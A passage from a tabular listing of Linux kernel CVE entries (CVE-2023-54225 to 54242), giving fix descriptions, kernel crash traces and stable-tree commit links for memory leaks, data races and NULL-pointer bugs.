ipa_filter_reset_table() a transaction is allocated to zero modem filter table entries. If hashing is not supported, hashed table memory should not be zeroed. But currently nothing prevents that, and the result is an unused transaction. Something similar occurs when we zero routing table entries for the modem. By preventing any attempt to clear hashed tables when hashing is not supported, the reference count underflow is avoided in this case. Note that there likely remains an issue with properly freeing unused transactions (if they occur due to errors). This patch addresses only the underflows that Google originally reported. | 2025-12-30 | not yet calculated | CVE-2023-54225 | https://git.kernel.org/stable/c/50c24f0c940728792c8bdf65c1eaf6b91b3b0dcd https://git.kernel.org/stable/c/c00af3a818cc573e10100cc6770f0e47befa1fa4 https://git.kernel.org/stable/c/e11ec2b868af2b351c6c1e2e50eb711cc5423a10 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: af_unix: Fix data races around sk->sk_shutdown. KCSAN found a data race around sk->sk_shutdown where unix_release_sock() and unix_shutdown() update it under unix_state_lock(), OTOH unix_poll() and unix_dgram_poll() read it locklessly. We need to annotate the writes and reads with WRITE_ONCE() and READ_ONCE(). BUG: KCSAN: data-race in unix_poll / unix_release_sock write to 0xffff88800d0f8aec of 1 bytes by task 264 on cpu 0: unix_release_sock+0x75c/0x910 net/unix/af_unix.c:631 unix_release+0x59/0x80 net/unix/af_unix.c:1042 __sock_release+0x7d/0x170 net/socket.c:653 sock_close+0x19/0x30 net/socket.c:1397 __fput+0x179/0x5e0 fs/file_table.c:321 ____fput+0x15/0x20 fs/file_table.c:349 task_work_run+0x116/0x1a0 kernel/task_work.c:179 resume_user_mode_work include/linux/resume_user_mode.h:49 [inline] exit_to_user_mode_loop kernel/entry/common.c:171 [inline] exit_to_user_mode_prepare+0x174/0x180 kernel/entry/common.c:204 __syscall_exit_to_user_mode_work kernel/entry/common.c:286 [inline] syscall_exit_to_user_mode+0x1a/0x30 kernel/entry/common.c:297 do_syscall_64+0x4b/0x90 arch/x86/entry/common.c:86 entry_SYSCALL_64_after_hwframe+0x72/0xdc read to 0xffff88800d0f8aec of 1 bytes by task 222 on cpu 1: unix_poll+0xa3/0x2a0 net/unix/af_unix.c:3170 sock_poll+0xcf/0x2b0 net/socket.c:1385 vfs_poll include/linux/poll.h:88 [inline] ep_item_poll.isra.0+0x78/0xc0 fs/eventpoll.c:855 ep_send_events fs/eventpoll.c:1694 [inline] ep_poll fs/eventpoll.c:1823 [inline] do_epoll_wait+0x6c4/0xea0 fs/eventpoll.c:2258 __do_sys_epoll_wait fs/eventpoll.c:2270 [inline] __se_sys_epoll_wait fs/eventpoll.c:2265 [inline] __x64_sys_epoll_wait+0xcc/0x190 fs/eventpoll.c:2265 do_syscall_x64 arch/x86/entry/common.c:50 [inline] do_syscall_64+0x3b/0x90 arch/x86/entry/common.c:80 entry_SYSCALL_64_after_hwframe+0x72/0xdc value changed: 0x00 -> 0x03 Reported by Kernel Concurrency Sanitizer on: CPU: 1 PID: 222 Comm: dbus-broker Not tainted 6.3.0-rc7-02330-gca6270c12e20 #2 Hardware name: QEMU Standard PC (i440FX + PIIX, 1996), BIOS rel-1.16.0-0-gd239552ce722-prebuilt.qemu.org 04/01/2014 | 2025-12-30 | not yet calculated | CVE-2023-54226 | https://git.kernel.org/stable/c/1c488f4e95b498c977fbeae784983eb4cf6085e8 https://git.kernel.org/stable/c/196528ad484443627779540697f4fb0ef0e01c52 https://git.kernel.org/stable/c/8307e372e7445ec7d3cd2ff107ce5078eaa02815 https://git.kernel.org/stable/c/a41559ae3681975f1ced815d8d4c983b6b938499 https://git.kernel.org/stable/c/e410895892f99700ce54347d42c8dbe962eea9f4 https://git.kernel.org/stable/c/f237f79b63c9242450e6869adcd2c10445859f28 https://git.kernel.org/stable/c/e1d09c2c2f5793474556b60f83900e088d0d366d |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: blk-mq: fix tags leak when shrink nr_hw_queues Although we don't need to realloc set->tags[] when shrink nr_hw_queues, we need to free them. Or these tags will be leaked. How to reproduce: 1. mount -t configfs configfs /mnt 2. modprobe null_blk nr_devices=0 submit_queues=8 3. mkdir /mnt/nullb/nullb0 4. echo 1 > /mnt/nullb/nullb0/power 5. echo 4 > /mnt/nullb/nullb0/submit_queues 6. rmdir /mnt/nullb/nullb0 In step 4, will alloc 9 tags (8 submit queues and 1 poll queue), then in step 5, new_nr_hw_queues = 5 (4 submit queues and 1 poll queue). At last in step 6, only these 5 tags are freed, the other 4 tags leaked. | 2025-12-30 | not yet calculated | CVE-2023-54227 | https://git.kernel.org/stable/c/c0ef7493e68b8896806a2f598fcffbaa97333405 https://git.kernel.org/stable/c/e1dd7bc93029024af5688253b0c05181d6e01f8e |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: regulator: raa215300: Fix resource leak in case of error The clk_register_clkdev() allocates memory by calling vclkdev_alloc() and this memory is not freed in the error path. Similarly, resources allocated by clk_register_fixed_rate() are not freed in the error path. Fix these issues by using devm_clk_hw_register_fixed_rate() and devm_clk_hw_register_clkdev(). After this, the static variable clk is not needed. Replace it with local variable hw in probe() and drop calling clk_unregister_fixed_rate() from raa215300_rtc_unregister_device(). | 2025-12-30 | not yet calculated | CVE-2023-54228 | https://git.kernel.org/stable/c/2bf2d2ac9e67184dc99275875a6452ca6e3027ff https://git.kernel.org/stable/c/e21ac64e669e960688e79bf5babeed63132dac8a |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: wifi: ath11k: fix registration of 6Ghz-only phy without the full channel range Because of what seems to be a typo, a 6Ghz-only phy for which the BDF does not allow the 7115Mhz channel will fail to register: WARNING: CPU: 2 PID: 106 at net/wireless/core.c:907 wiphy_register+0x914/0x954 Modules linked in: ath11k_pci sbsa_gwdt CPU: 2 PID: 106 Comm: kworker/u8:5 Not tainted 6.3.0-rc7-next-20230418-00549-g1e096a17625a-dirty #9 Hardware name: Freebox V7R Board (DT) Workqueue: ath11k_qmi_driver_event ath11k_qmi_driver_event_work pstate: 60000005 (nZCv daif -PAN -UAO -TCO -DIT -SSBS BTYPE=--) pc : wiphy_register+0x914/0x954 lr : ieee80211_register_hw+0x67c/0xc10 sp : ffffff800b123aa0 x29: ffffff800b123aa0 x28: 0000000000000000 x27: 0000000000000000 x26: 0000000000000000 x25: 0000000000000006 x24: ffffffc008d51418 x23: ffffffc008cb0838 x22: ffffff80176c2460 x21: 0000000000000168 x20: ffffff80176c0000 x19: ffffff80176c03e0 x18: 0000000000000014 x17: 00000000cbef338c x16: 00000000d2a26f21 x15: 00000000ad6bb85f x14: 0000000000000020 x13: 0000000000000020 x12: 00000000ffffffbd x11: 0000000000000208 x10: 00000000fffffdf7 x9 : ffffffc009394718 x8 : ffffff80176c0528 x7 : 000000007fffffff x6 : 0000000000000006 x5 : 0000000000000005 x4 : ffffff800b304284 x3 : ffffff800b304284 x2 : ffffff800b304d98 x1 : 0000000000000000 x0 : 0000000000000000 Call trace: wiphy_register+0x914/0x954 ieee80211_register_hw+0x67c/0xc10 ath11k_mac_register+0x7c4/0xe10 ath11k_core_qmi_firmware_ready+0x1f4/0x570 ath11k_qmi_driver_event_work+0x198/0x590 process_one_work+0x1b8/0x328 worker_thread+0x6c/0x414 kthread+0x100/0x104 ret_from_fork+0x10/0x20 ---[ end trace 0000000000000000 ]--- ath11k_pci 0002:01:00.0: ieee80211 registration failed: -22 ath11k_pci 0002:01:00.0: failed register the radio with mac80211: -22 ath11k_pci 0002:01:00.0: failed to create pdev core: -22 | 2025-12-30 | not yet calculated | CVE-2023-54229 | https://git.kernel.org/stable/c/532f8bac60419eb28158770470b9bb655de207c8 https://git.kernel.org/stable/c/f97832620d7f320bea81707f34631371e87a419b https://git.kernel.org/stable/c/8d1342108c2bf11aaaf293becfc010ecdb6170d9 https://git.kernel.org/stable/c/32ca096e712a78b2f0d2e48d33dc0caaba9f9866 https://git.kernel.org/stable/c/e2ceb1de2f83aafd8003f0b72dfd4b7441e97d14 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: amba: bus: fix refcount leak commit 5de1540b7bc4 ("drivers/amba: create devices from device tree") increases the refcount of of_node, but not releases it in amba_device_release, so there is refcount leak. By using of_node_put to avoid refcount leak. | 2025-12-30 | not yet calculated | CVE-2023-54230 | https://git.kernel.org/stable/c/94e398df32e850f26828690ee62f7441979583cc https://git.kernel.org/stable/c/9062ce0ccbd82fbe81cc839a512c0ad90847e01c https://git.kernel.org/stable/c/03db4fe7917bb160eeccf3968835475fa32b7e10 https://git.kernel.org/stable/c/9baf2278b3eed2c50112169121257d8a6ee0606c https://git.kernel.org/stable/c/4f1807fddd9bf175ee5e14fffc6b6106e4b297ef https://git.kernel.org/stable/c/81ff633a88be2482c163d3acd2801d501261ce6a https://git.kernel.org/stable/c/206fadb7278ceac7593dd0b945a77b9df856a674 https://git.kernel.org/stable/c/8b60a706166de5de82314494704c2419e7657bf8 https://git.kernel.org/stable/c/e312cbdc11305568554a9e18a2ea5c2492c183f3 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: net: libwx: fix memory leak in wx_setup_rx_resources When wx_alloc_page_pool() failed in wx_setup_rx_resources(), it doesn't release DMA buffer. Add dma_free_coherent() in the error path to release the DMA buffer. | 2025-12-30 | not yet calculated | CVE-2023-54231 | https://git.kernel.org/stable/c/2371e1ecd445baf793a74db00ea6b2a2bc13c4c0 https://git.kernel.org/stable/c/e315e7b83a22043bffee450437d7089ef373cbf6 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: m68k: Only force 030 bus error if PC not in exception table __get_kernel_nofault() does copy data in supervisor mode when forcing a task backtrace log through /proc/sysrq_trigger. This is expected cause a bus error exception on e.g. NULL pointer dereferencing when logging a kernel task has no workqueue associated. This bus error ought to be ignored. Our 030 bus error handler is ill equipped to deal with this: Whenever ssw indicates a kernel mode access on a data fault, we don't even attempt to handle the fault and instead always send a SEGV signal (or panic). As a result, the check for exception handling at the fault PC (buried in send_sig_fault() which gets called from do_page_fault() eventually) is never used. In contrast, both 040 and 060 access error handlers do not care whether a fault happened on supervisor mode access, and will call do_page_fault() on those, ultimately honoring the exception table. Add a check in bus_error030 to call do_page_fault() in case we do have an entry for the fault PC in our exception table. I had attempted a fix for this earlier in 2019 that did rely on testing pagefault_disabled() (see link below) to achieve the same thing, but this patch should be more generic. Tested on 030 Atari Falcon. | 2025-12-30 | not yet calculated | CVE-2023-54232 | https://git.kernel.org/stable/c/1a6059f5ed57f48edfe7159404ff7d538d9d405b https://git.kernel.org/stable/c/f55cb52ec98b22125f5bda36391edb8894f7e8cf https://git.kernel.org/stable/c/2100e374251a8fc00cce1916cfc50f3cb652cbe3 https://git.kernel.org/stable/c/df1da53a7e98f0b2a0eb2241c154f148f2f2c1d8 https://git.kernel.org/stable/c/8bf8d5dade4c5e1d8a2386f29253ed28b5d87735 https://git.kernel.org/stable/c/54fa25ffab2b700df5abd58c136d64a912c53953 https://git.kernel.org/stable/c/ec15405b80fc15ffc87a23d01378ae061c1aba07 https://git.kernel.org/stable/c/e36a82bebbf7da814530d5a179bef9df5934b717 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: ASoC: SOF: avoid a NULL dereference with unsupported widgets If an IPC4 topology contains an unsupported widget, its .module_info field won't be set, then sof_ipc4_route_setup() will cause a kernel Oops trying to dereference it. Add a check for such cases. | 2025-12-30 | not yet calculated | CVE-2023-54233 | https://git.kernel.org/stable/c/170818974e9732506195c6302743856cc8bdfd6f https://git.kernel.org/stable/c/e3720f92e0237921da537e47a0b24e27899203f8 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: scsi: mpi3mr: Fix missing mrioc->evtack_cmds initialization Commit c1af985d27da ("scsi: mpi3mr: Add Event acknowledgment logic") introduced an array mrioc->evtack_cmds but initialization of the array elements was missed. They are just zero cleared. The function mpi3mr_complete_evt_ack() refers host_tag field of the elements. Due to the zero value of the host_tag field, the function calls clear_bit() for mrico->evtack_cmds_bitmap with wrong bit index. This results in memory access to invalid address and "BUG: KASAN: use-after-free". This BUG was observed at eHBA-9600 firmware update to version 8.3.1.0. To fix it, add the missing initialization of mrioc->evtack_cmds. | 2025-12-30 | not yet calculated | CVE-2023-54234 | https://git.kernel.org/stable/c/4e0dfdb48a824deac3dfbc67fb856ef2aee13529 https://git.kernel.org/stable/c/67989091e11a974003ddf2ec39bc613df8eadd83 https://git.kernel.org/stable/c/e39ea831ebad4ab15c4748cb62a397a8abcca36e |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: PCI/DOE: Fix destroy_work_on_stack() race The following debug object splat was observed in testing: ODEBUG: free active (active state 0) object: 0000000097d23782 object type: work_struct hint: doe_statemachine_work+0x0/0x510 WARNING: CPU: 1 PID: 71 at lib/debugobjects.c:514 debug_print_object+0x7d/0xb0 ... Workqueue: pci 0000:36:00.0 DOE [1 doe_statemachine_work RIP: 0010:debug_print_object+0x7d/0xb0 ... Call Trace: ? debug_print_object+0x7d/0xb0 ? __pfx_doe_statemachine_work+0x10/0x10 debug_object_free.part.0+0x11b/0x150 doe_statemachine_work+0x45e/0x510 process_one_work+0x1d4/0x3c0 This occurs because destroy_work_on_stack() was called after signaling the completion in the calling thread. This creates a race between destroy_work_on_stack() and the task->work struct going out of scope in pci_doe(). Signal the work complete after destroying the work struct. This is safe because signal_task_complete() is the final thing the work item does and the workqueue code is careful not to access the work struct after. | 2025-12-30 | not yet calculated | CVE-2023-54235 | https://git.kernel.org/stable/c/d96799ee3b78962c80e4b6653734f488f999ca09 https://git.kernel.org/stable/c/c4f9c0a3a6df143f2e1092823b7fa9e07d6ab57f https://git.kernel.org/stable/c/19cf3ba16dcc2ef059dcf010072d4f96d76486e0 https://git.kernel.org/stable/c/e3a3a097eaebaf234a482b4d2f9f18fe989208c1 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: net/net_failover: fix txq exceeding warning The failover txq is inited as 16 queues. when a packet is transmitted from the failover device firstly, the failover device will select the queue which is returned from the primary device if the primary device is UP and running. If the primary device txq is bigger than the default 16, it can lead to the following warning: eth0 selects TX queue 18, but real number of TX queues is 16 The warning backtrace is: [ 32.146376] CPU: 18 PID: 9134 Comm: chronyd Tainted: G E 6.2.8-1.el7.centos.x86_64 #1 [ 32.147175] Hardware name: Red Hat KVM, BIOS 1.10.2-3.el7_4.1 04/01/2014 [ 32.147730] Call Trace: [ 32.147971] <TASK> [ 32.148183] dump_stack_lvl+0x48/0x70 [ 32.148514] dump_stack+0x10/0x20 [ 32.148820] netdev_core_pick_tx+0xb1/0xe0 [ 32.149180] __dev_queue_xmit+0x529/0xcf0 [ 32.149533] ? __check_object_size.part.0+0x21c/0x2c0 [ 32.149967] ip_finish_output2+0x278/0x560 [ 32.150327] __ip_finish_output+0x1fe/0x2f0 [ 32.150690] ip_finish_output+0x2a/0xd0 [ 32.151032] ip_output+0x7a/0x110 [ 32.151337] ? __pfx_ip_finish_output+0x10/0x10 [ 32.151733] ip_local_out+0x5e/0x70 [ 32.152054] ip_send_skb+0x19/0x50 [ 32.152366] udp_send_skb.isra.0+0x163/0x3a0 [ 32.152736] udp_sendmsg+0xba8/0xec0 [ 32.153060] ? __folio_memcg_unlock+0x25/0x60 [ 32.153445] ? __pfx_ip_generic_getfrag+0x10/0x10 [ 32.153854] ? sock_has_perm+0x85/0xa0 [ 32.154190] inet_sendmsg+0x6d/0x80 [ 32.154508] ? inet_sendmsg+0x6d/0x80 [ 32.154838] sock_sendmsg+0x62/0x70 [ 32.155152] ____sys_sendmsg+0x134/0x290 [ 32.155499] ___sys_sendmsg+0x81/0xc0 [ 32.155828] ? _get_random_bytes.part.0+0x79/0x1a0 [ 32.156240] ? ip4_datagram_release_cb+0x5f/0x1e0 [ 32.156649] ? get_random_u16+0x69/0xf0 [ 32.156989] ? __fget_light+0xcf/0x110 [ 32.157326] __sys_sendmmsg+0xc4/0x210 [ 32.157657] ? __sys_connect+0xb7/0xe0 [ 32.157995] ? __audit_syscall_entry+0xce/0x140 [ 32.158388] ? syscall_trace_enter.isra.0+0x12c/0x1a0 [ 32.158820] __x64_sys_sendmmsg+0x24/0x30 [ 32.159171] do_syscall_64+0x38/0x90 [ 32.159493] entry_SYSCALL_64_after_hwframe+0x72/0xdc Fix that by reducing txq number as the non-existent primary-dev does. | 2025-12-30 | not yet calculated | CVE-2023-54236 | https://git.kernel.org/stable/c/105cc268328231d5c2bfcbd03f265cec444a3492 https://git.kernel.org/stable/c/f032e125149d914e542548c17ebd613851031368 https://git.kernel.org/stable/c/2d5cebf57296f0189a61482035ad420384eedead https://git.kernel.org/stable/c/c942f5cd63b7c2e73fe06744185a34b03267595b https://git.kernel.org/stable/c/44d250c22209c680f61befbc2ac326da5452da01 https://git.kernel.org/stable/c/e3cbdcb0fbb61045ef3ce0e072927cc41737f787 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: net/smc: fix potential panic dues to unprotected smc_llc_srv_add_link() There is a certain chance to trigger the following panic: PID: 5900 TASK: ffff88c1c8af4100 CPU: 1 COMMAND: "kworker/1:48" #0 [ffff9456c1cc79a0] machine_kexec at ffffffff870665b7 #1 [ffff9456c1cc79f0] __crash_kexec at ffffffff871b4c7a #2 [ffff9456c1cc7ab0] crash_kexec at ffffffff871b5b60 #3 [ffff9456c1cc7ac0] oops_end at ffffffff87026ce7 #4 [ffff9456c1cc7ae0] page_fault_oops at ffffffff87075715 #5 [ffff9456c1cc7b58] exc_page_fault at ffffffff87ad0654 #6 [ffff9456c1cc7b80] asm_exc_page_fault at ffffffff87c00b62 [exception RIP: ib_alloc_mr+19] RIP: ffffffffc0c9cce3 RSP: ffff9456c1cc7c38 RFLAGS: 00010202 RAX: 0000000000000000 RBX: 0000000000000002 RCX: 0000000000000004 RDX: 0000000000000010 RSI: 0000000000000000 RDI: 0000000000000000 RBP: ffff88c1ea281d00 R8: 000000020a34ffff R9: ffff88c1350bbb20 R10: 0000000000000000 R11: 0000000000000001 R12: 0000000000000000 R13: 0000000000000010 R14: ffff88c1ab040a50 R15: ffff88c1ea281d00 ORIG_RAX: ffffffffffffffff CS: 0010 SS: 0018 #7 [ffff9456c1cc7c60] smc_ib_get_memory_region at ffffffffc0aff6df [smc] #8 [ffff9456c1cc7c88] smcr_buf_map_link at ffffffffc0b0278c [smc] #9 [ffff9456c1cc7ce0] __smc_buf_create at ffffffffc0b03586 [smc] The reason here is that when the server tries to create a second link, smc_llc_srv_add_link() has no protection and may add a new link to link group. This breaks the security environment protected by llc_conf_mutex. | 2025-12-30 | not yet calculated | CVE-2023-54237 | https://git.kernel.org/stable/c/f2f46de98c11d41ac8d22765f47ba54ce5480a5b https://git.kernel.org/stable/c/0c764cc271d3aa6528ae1b3394babf34ac01f775 https://git.kernel.org/stable/c/e40b801b3603a8f90b46acbacdea3505c27f01c0 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: mlx5: fix skb leak while fifo resync and push During ptp resync operation SKBs were poped from the fifo but were never freed neither by napi_consume nor by dev_kfree_skb_any. Add call to napi_consume_skb to properly free SKBs. Another leak was happening because mlx5e_skb_fifo_has_room() had an error in the check. Comparing free running counters works well unless C promotes the types to something wider than the counter. In this case counters are u16 but the result of the substraction is promouted to int and it causes wrong result (negative value) of the check when producer have already overlapped but consumer haven't yet. Explicit cast to u16 fixes the issue. | 2025-12-30 | not yet calculated | CVE-2023-54238 | https://git.kernel.org/stable/c/234cffda95e1049f58e8ec136ef105c633f0ed19 https://git.kernel.org/stable/c/68504c66d08c70fb92799722e25a932d311d74fd https://git.kernel.org/stable/c/e435941b1da1a0be4ff8a7ae425774c76a5ac514 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: iommufd: Check for uptr overflow syzkaller found that setting up a map with a user VA that wraps past zero can trigger WARN_ONs, particularly from pin_user_pages weirdly returning 0 due to invalid arguments. Prevent creating a pages with a uptr and size that would math overflow. WARNING: CPU: 0 PID: 518 at drivers/iommu/iommufd/pages.c:793 pfn_reader_user_pin+0x2e6/0x390 Modules linked in: CPU: 0 PID: 518 Comm: repro Not tainted 6.3.0-rc2-eeac8ede1755+ #1 Hardware name: QEMU Standard PC (i440FX + PIIX, 1996), BIOS rel-1.16.0-0-gd239552ce722-prebuilt.qemu.org 04/01/2014 RIP: 0010:pfn_reader_user_pin+0x2e6/0x390 Code: b1 11 e9 25 fe ff ff e8 28 e4 0f ff 31 ff 48 89 de e8 2e e6 0f ff 48 85 db 74 0a e8 14 e4 0f ff e9 4d ff ff ff e8 0a e4 0f ff <0f> 0b bb f2 ff ff ff e9 3c ff ff ff e8 f9 e3 0f ff ba 01 00 00 00 RSP: 0018:ffffc90000f9fa30 EFLAGS: 00010246 RAX: 0000000000000000 RBX: 0000000000000000 RCX: ffffffff821e2b72 RDX: 0000000000000000 RSI: ffff888014184680 RDI: 0000000000000002 RBP: ffffc90000f9fa78 R08: 00000000000000ff R09: 0000000079de6f4e R10: ffffc90000f9f790 R11: ffff888014185418 R12: ffffc90000f9fc60 R13: 0000000000000002 R14: ffff888007879800 R15: 0000000000000000 FS: 00007f4227555740(0000) GS:ffff88807dc00000(0000) knlGS:0000000000000000 CS: 0010 DS: 0000 ES: 0000 CR0: 0000000080050033 CR2: 0000000020000043 CR3: 000000000e748005 CR4: 0000000000770ef0 PKRU: 55555554 Call Trace: <TASK> pfn_reader_next+0x14a/0x7b0 ? interval_tree_double_span_iter_update+0x11a/0x140 pfn_reader_first+0x140/0x1b0 iopt_pages_rw_slow+0x71/0x280 ? __this_cpu_preempt_check+0x20/0x30 iopt_pages_rw_access+0x2b2/0x5b0 iommufd_access_rw+0x19f/0x2f0 iommufd_test+0xd11/0x16f0 ? write_comp_data+0x2f/0x90 iommufd_fops_ioctl+0x206/0x330 __x64_sys_ioctl+0x10e/0x160 ? __pfx_iommufd_fops_ioctl+0x10/0x10 do_syscall_64+0x3b/0x90 entry_SYSCALL_64_after_hwframe+0x72/0xdc | 2025-12-30 | not yet calculated | CVE-2023-54239 | https://git.kernel.org/stable/c/800963e7eb001ada8cf2418f159fb649694467f1 https://git.kernel.org/stable/c/e4395701330fc4aee530905039516fe770b81417 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: net: ethernet: mtk_eth_soc: fix possible NULL pointer dereference in mtk_hwlro_get_fdir_all() rule_locs is allocated in ethtool_get_rxnfc and the size is determined by rule_cnt from user space. So rule_cnt needs to be check before using rule_locs to avoid NULL pointer dereference. | 2025-12-30 | not yet calculated | CVE-2023-54240 | https://git.kernel.org/stable/c/7776591e5ae2befff86579f68916a171971c6aab https://git.kernel.org/stable/c/751b2e22a188b0c306029d094da29b6b8de31430 https://git.kernel.org/stable/c/653fbddbdfc6673bba01b13dae5a4384ad8f92ec https://git.kernel.org/stable/c/75f2de75c1182e80708c932418e4895dbc88b68f https://git.kernel.org/stable/c/072324cfab9b96071c0782f51f53cc5aea1e9d5b https://git.kernel.org/stable/c/ff5faed5f5487b0fd2b640ba1304f82a5ebaab42 https://git.kernel.org/stable/c/fe0195fe48f85182bc7e7eabcad925bd3cbc10f5 https://git.kernel.org/stable/c/e4c79810755f66c9a933ca810da2724133b1165a |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: MIPS: KVM: Fix NULL pointer dereference After commit 45c7e8af4a5e3f0bea4ac209 ("MIPS: Remove KVM_TE support") we get a NULL pointer dereference when creating a KVM guest: [ 146.243409] Starting KVM with MIPS VZ extensions [ 149.849151] CPU 3 Unable to handle kernel paging request at virtual address 0000000000000300, epc == ffffffffc06356ec, ra == ffffffffc063568c [ 149.849177] Oops[#1]: [ 149.849182] CPU: 3 PID: 2265 Comm: qemu-system-mip Not tainted 6.4.0-rc3+ #1671 [ 149.849188] Hardware name: THTF CX TL630 Series/THTF-LS3A4000-7A1000-ML4A, BIOS KL4.1F.TF.D.166.201225.R 12/25/2020 [ 149.849192] $ 0 : 0000000000000000 000000007400cce0 0000000000400004 ffffffff8119c740 [ 149.849209] $ 4 : 000000007400cce1 000000007400cce1 0000000000000000 0000000000000000 [ 149.849221] $ 8 : 000000240058bb36 ffffffff81421ac0 0000000000000000 0000000000400dc0 [ 149.849233] $12 : 9800000102a07cc8 ffffffff80e40e38 0000000000000001 0000000000400dc0 [ 149.849245] $16 : 0000000000000000 9800000106cd0000 9800000106cd0000 9800000100cce000 [ 149.849257] $20 : ffffffffc0632b28 ffffffffc05b31b0 9800000100ccca00 0000000000400000 [ 149.849269] $24 : 9800000106cd09ce ffffffff802f69d0 [ 149.849281] $28 : 9800000102a04000 9800000102a07cd0 98000001106a8000 ffffffffc063568c [ 149.849293] Hi : 00000335b2111e66 [ 149.849295] Lo : 6668d90061ae0ae9 [ 149.849298] epc : ffffffffc06356ec kvm_vz_vcpu_setup+0xc4/0x328 [kvm] [ 149.849324] ra : ffffffffc063568c kvm_vz_vcpu_setup+0x64/0x328 [kvm] [ 149.849336] Status: 7400cce3 KX SX UX KERNEL EXL IE [ 149.849351] Cause : 1000000c (ExcCode 03) [ 149.849354] BadVA : 0000000000000300 [ 149.849357] PrId : 0014c004 (ICT Loongson-3) [ 149.849360] Modules linked in: kvm nfnetlink_queue nfnetlink_log nfnetlink fuse sha256_generic libsha256 cfg80211 rfkill binfmt_misc vfat fat snd_hda_codec_hdmi input_leds led_class snd_hda_intel snd_intel_dspcfg snd_hda_codec snd_hda_core snd_pcm snd_timer snd serio_raw xhci_pci radeon drm_suballoc_helper drm_display_helper xhci_hcd ip_tables x_tables [ 149.849432] Process qemu-system-mip (pid: 2265, threadinfo=00000000ae2982d2, task=0000000038e09ad4, tls=000000ffeba16030) [ 149.849439] Stack : 9800000000000003 9800000100ccca00 9800000100ccc000 ffffffffc062cef4 [ 149.849453] 9800000102a07d18 c89b63a7ab338e00 0000000000000000 ffffffff811a0000 [ 149.849465] 0000000000000000 9800000106cd0000 ffffffff80e59938 98000001106a8920 [ 149.849476] ffffffff80e57f30 ffffffffc062854c ffffffff811a0000 9800000102bf4240 [ 149.849488] ffffffffc05b0000 ffffffff80e3a798 000000ff78000000 000000ff78000010 [ 149.849500] 0000000000000255 98000001021f7de0 98000001023f0078 ffffffff81434000 [ 149.849511] 0000000000000000 0000000000000000 9800000102ae0000 980000025e92ae28 [ 149.849523] 0000000000000000 c89b63a7ab338e00 0000000000000001 ffffffff8119dce0 [ 149.849535] 000000ff78000010 ffffffff804f3d3c 9800000102a07eb0 0000000000000255 [ 149.849546] 0000000000000000 ffffffff8049460c 000000ff78000010 0000000000000255 [ 149.849558] ... [ 149.849565] Call Trace: [ 149.849567] [<ffffffffc06356ec>] kvm_vz_vcpu_setup+0xc4/0x328 [kvm] [ 149.849586] [<ffffffffc062cef4>] kvm_arch_vcpu_create+0x184/0x228 [kvm] [ 149.849605] [<ffffffffc062854c>] kvm_vm_ioctl+0x64c/0xf28 [kvm] [ 149.849623] [<ffffffff805209c0>] sys_ioctl+0xc8/0x118 [ 149.849631] [<ffffffff80219eb0>] syscall_common+0x34/0x58 The root cause is the deletion of kvm_mips_commpage_init() leaves vcpu ->arch.cop0 NULL. So fix it by making cop0 from a pointer to an embedded object. | 2025-12-30 | not yet calculated | CVE-2023-54241 | https://git.kernel.org/stable/c/cd517f9a9d07d41f4f3593b1da3982261e09d162 https://git.kernel.org/stable/c/bd9cf2a5f9e1b2229ad22f21de6f6ad1a9c8858e https://git.kernel.org/stable/c/6b9fb255d53759e3ea9b30067cb55091df1caf06 https://git.kernel.org/stable/c/e4de2057698636c0ee709e545d19b169d2069fa3 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: block, bfq: Fix division by zero error on zero wsum When the weighted sum is zero the calculation of limit causes a division by zero error. Fix this by continuing to the next level. This was discovered by running as root: stress-ng --ioprio 0 Fixes divison by error oops: [ 521.450556] divide error: 0000 [#1] SMP NOPTI [ 521.450766] CPU: 2 PID: 2684464 Comm: stress-ng-iopri Not tainted 6.2.1-1280.native #1 [ 521.451117] Hardware name: QEMU Standard PC (i440FX + PIIX, 1996), BIOS rel-1.16.1-0-g3208b098f51a-prebuilt.qemu.org 04/01/2014 [ 521.451627] RIP: 0010:bfqq_request_over_limit+0x207/0x400 [ 521.451875] Code: 01 48 8d 0c c8 74 0b 48 8b 82 98 00 00 00 48 8d 0c c8 8b 85 34 ff ff ff 48 89 ca 41 0f af 41 50 48 d1 ea 48 98 48 01 d0 31 d2 <48> f7 f1 41 39 41 48 89 85 34 ff ff ff 0f 8c 7b 01 00 00 49 8b 44 [ 521.452699] RSP: 0018:ffffb1af84eb3948 EFLAGS: 00010046 [ 521.452938] RAX: 000000000000003c RBX: 0000000000000000 RCX: 0000000000000000 [ 521.453262] RDX: 0000000000000000 RSI: 0000000000000000 RDI: ffffb1af84eb3978 [ 521.453584] RBP: ffffb1af84eb3a30 R08: 0000000000000001 R09: ffff8f88ab8a4ba0 [ 521.453905] R10: 0000000000000000 R11: 0000000000000001 R12: ffff8f88ab8a4b18 [ 521.454224] R13: ffff8f8699093000 R14: 0000000000000001 R15: ffffb1af84eb3970 [ 521.454549] FS: 00005640b6b0b580(0000) GS:ffff8f88b3880000(0000) knlGS:0000000000000000 [ 521.454912] CS: 0010 DS: 0000 ES: 0000 CR0: 0000000080050033 [ 521.455170] CR2: 00007ffcbcae4e38 CR3: 00000002e46de001 CR4: 0000000000770ee0 [ 521.455491] PKRU: 55555554 [ 521.455619] Call Trace: [ 521.455736] <TASK> [ 521.455837] ? bfq_request_merge+0x3a/0xc0 [ 521.456027] ? elv_merge+0x115/0x140 [ 521.456191] bfq_limit_depth+0xc8/0x240 [ 521.456366] __blk_mq_alloc_requests+0x21a/0x2c0 [ 521.456577] blk_mq_submit_bio+0x23c/0x6c0 [ 521.456766] __submit_bio+0xb8/0x140 [ 521.457236] submit_bio_noacct_nocheck+0x212/0x300 [ 521.457748] submit_bio_noacct+0x1a6/0x580 